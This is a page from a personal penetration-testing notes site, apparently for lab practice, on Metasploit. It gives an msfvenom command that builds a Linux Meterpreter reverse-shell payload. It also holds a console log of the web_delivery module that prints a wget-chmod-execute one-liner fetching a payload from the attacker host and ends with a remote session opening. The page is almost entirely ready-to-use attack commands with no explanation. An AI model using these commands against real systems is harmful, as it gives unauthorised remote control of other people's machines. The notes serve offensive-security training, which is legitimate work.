#TodayILearned
  • Intro
  • Mobile
    • ADB
    • Bundletool
    • Frida
    • Objection
    • Apktool
    • Patching Smali
    • jadx
    • Xamarin
    • Emulator
    • Correlium
  • Network
    • Bettercap
  • Red Team
    • Unicorn
    • Macros
    • Defense Evasion
      • Load shellcode from memory using Golang
      • Hershell
    • Initial Compromise
      • Password Spraying
  • Web
    • Burp
    • IIS
  • Pentest
    • Metasploit
    • sqlmap
    • Hashcat
  • Miscellaneous
  • Recon
  • Docker
    • GitHub
    • Pulling from an insecure registry
    • Exploring a Docker image
  • Recon
    • Aquatone
    • Censys
    • MassDNS
    • S3 buckets enumeration with ffuf
    • Shodan
  • Flutter
    • Privilege Escalation
  • SSTI
Powered by GitBook
On this page

Was this helpful?

  1. Pentest

Metasploit

msfvenom -p linux/x86/meterpreter_reverse_https lhost=xx.xx.xx.xx lport=xxxx -f elf > /tmp/reverse_https.elf

Web Delivery

msf6 exploit(multi/handler) >
msf6 exploit(multi/handler) > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set LHOST  10.10.14.48
LHOST => 10.10.14.48
msf6 exploit(multi/script/web_delivery) > set target 7
target => 7
msf6 exploit(multi/script/web_delivery) > run -J
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) >
[*] Started reverse TCP handler on 10.10.14.48:4444
[*] Using URL: http://0.0.0.0:8080/hPVOArQh
[*] Local IP: http://192.168.0.22:8080/hPVOArQh
[*] Server started.
[*] Run the following command on the target machine:
wget -qO K2RLRzHQ --no-check-certificate http://10.10.14.48:8080/hPVOArQh; chmod +x K2RLRzHQ; ./K2RLRzHQ& disown
[*] Sending stage (3012548 bytes) to 10.10.10.226

msf6 exploit(multi/script/web_delivery) > [*] Meterpreter session 1 opened (10.10.14.48:4444 -> 10.10.10.226:50338) at 2021-05-15 18:29:39 +0200
PreviousIISNextsqlmap

Last updated 4 years ago

Was this helpful?